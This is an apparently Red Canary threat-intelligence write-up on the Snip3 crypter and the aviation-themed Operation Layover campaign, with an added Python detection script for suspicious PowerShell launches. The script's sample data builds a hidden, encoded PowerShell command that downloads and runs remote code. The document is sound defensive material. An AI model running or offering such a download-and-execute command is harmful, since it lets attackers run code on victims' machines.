Editors’ note: While the analysis and detection opportunities remain applicable, this page has not been updated since 2022.
Throughout 2021, Red Canary observed operators using the crypters HCrypt and Snip3 to deliver various remote access trojans (RATs). Like other “as-a-service” threats, the developers sell or lease these crypters to affiliates who use them to carry out campaigns, expanding the threat landscape and creating new economies of scale. The “as-a-service” ecosystem lowers the technical barrier to entry, allowing operators to purchase capabilities rather than develop them.
Like HCrypt, Snip3 is a crypter designed to evade detection and download additional malware. Snip3 is often delivered via phishing emails that prompt victims to download a VBScript (.vbs) file. To evade detection, Snip3 launches obfuscated PowerShell commands with the -ExecutionPolicy RemoteSigned parameter, which sets the policy for that process only and lets locally created, unsigned scripts run regardless of the machine’s configured policy. We’ve observed these PowerShell commands connecting to top4top[.]io, a legitimate file-sharing service popular in Egypt, Algeria, and Yemen.
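The PowerShell behaviour described above, turned into a small detection pass, as an added example that is not Red Canary’s code or a Snip3 sample: it scores process-start events for an execution policy of RemoteSigned (including the short forms powershell.exe accepts), a hidden window, an encoded command, a script-host parent such as wscript.exe, and a connection to top4top[.]io. The event schema, the sample command lines and the encoded payload are constructed for the example and are assumptions, not captured Snip3 artifacts.

```python
# Added example (not Red Canary's code, not a Snip3 sample): score constructed
# PowerShell process-start events for the behaviour the text describes.
import base64
import re
from dataclasses import dataclass, field


@dataclass
class ProcessEvent:
    parent_image: str
    image: str
    command_line: str
    # Hostnames the process connected to; a constructed field standing in for
    # whatever network telemetry your EDR joins to the process.
    dest_hosts: list = field(default_factory=list)


SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe"}
FILE_SHARE_HOSTS = {"top4top.io"}  # named in the text (defanged there as top4top[.]io)

# powershell.exe accepts unambiguous prefixes of its switches, so -ex, -exec,
# -executionpolicy and the shortcut -ep all set the execution policy.
EXEC_POLICY_RE = re.compile(r"(?i)(?:^|\s)[-/](?:ep|ex[a-z]*)\s+remotesigned\b")
# -e, -ec, -enc, -encodedcommand all take base64 of UTF-16LE script text.
ENCODED_RE = re.compile(r"(?i)(?:^|\s)[-/]e(?:c|nc[a-z]*)?\s+([A-Za-z0-9+/=]+)")
HIDDEN_RE = re.compile(r"(?i)(?:^|\s)[-/]w[a-z]*\s+hidden\b")


def decode_encoded_command(command_line: str):
    """Return the decoded -EncodedCommand payload, or None if absent or invalid."""
    m = ENCODED_RE.search(command_line)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def score_event(ev: ProcessEvent):
    """Score one event; returns (score, reasons). Non-PowerShell images score 0."""
    reasons = []
    if ev.image.lower() != "powershell.exe":
        return 0, reasons
    cmd = ev.command_line
    decoded = decode_encoded_command(cmd)
    if decoded is not None:
        reasons.append("encoded command")
        cmd = cmd + " " + decoded  # inspect the decoded script text as well
    if EXEC_POLICY_RE.search(cmd):
        reasons.append("execution policy remotesigned")
    if HIDDEN_RE.search(cmd):
        reasons.append("hidden window")
    if ev.parent_image.lower() in SCRIPT_HOSTS:
        reasons.append(f"spawned by {ev.parent_image.lower()}")
    for host in ev.dest_hosts:
        h = host.lower()
        if h in FILE_SHARE_HOSTS or any(h.endswith("." + s) for s in FILE_SHARE_HOSTS):
            reasons.append(f"connection to {host}")
            break
    return len(reasons), reasons


def analyze(events, threshold=3):
    """Return events whose score meets the threshold, with their reasons."""
    hits = []
    for i, ev in enumerate(events):
        score, reasons = score_event(ev)
        if score >= threshold:
            hits.append({"index": i, "score": score, "reasons": reasons})
    return hits


# Constructed sample telemetry: the paths, the URL and the encoded payload are
# made up for this example.
ENCODED_PAYLOAD = base64.b64encode(
    "IEX (New-Object Net.WebClient).DownloadString('https://top4top.io/example')"
    .encode("utf-16le")
).decode()
SAMPLE_EVENTS = [
    ProcessEvent("wscript.exe", "powershell.exe",
                 f"powershell.exe -ep remotesigned -w hidden -enc {ENCODED_PAYLOAD}",
                 dest_hosts=["top4top.io"]),
    ProcessEvent("explorer.exe", "powershell.exe",
                 "powershell.exe -ExecutionPolicy RemoteSigned -File C:\\Scripts\\Backup.ps1"),
    ProcessEvent("services.exe", "svchost.exe", "svchost.exe -k netsvcs"),
]

if __name__ == "__main__":
    for hit in analyze(SAMPLE_EVENTS):
        ev = SAMPLE_EVENTS[hit["index"]]
        print(f"[{hit['score']}] {ev.parent_image} -> {ev.command_line[:60]}...")
        for reason in hit["reasons"]:
            print("   -", reason)
```

The threshold matters: RemoteSigned on its own is routine administrator behaviour (the second constructed event), so on its own it is a hunting lead rather than an alert. Requiring the script-host parent or the file-sharing destination alongside it is what makes the rule fire on the first event and stay quiet on the second.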
Because these crypters are used by various adversaries delivering different payloads, it can be difficult to cluster seemingly disparate activity. However, public reporting on Snip3 has discussed specific targeting of victims in the aviation sector, and we know of at least one set of operators that consistently relies on phishing emails with lures related to travel or cargo, so we’ve associated activity we saw in 2021 with a campaign Cisco calls Operation Layover. We assess with high confidence that certain activity we observed in 2021 overlaps with this long-running operation, also chronicled by researchers from Morphisec and Microsoft. While this campaign involved attempts to deliver AsyncRAT or RevengeRAT to victims, similar intrusion chains deliver other publicly available RATs.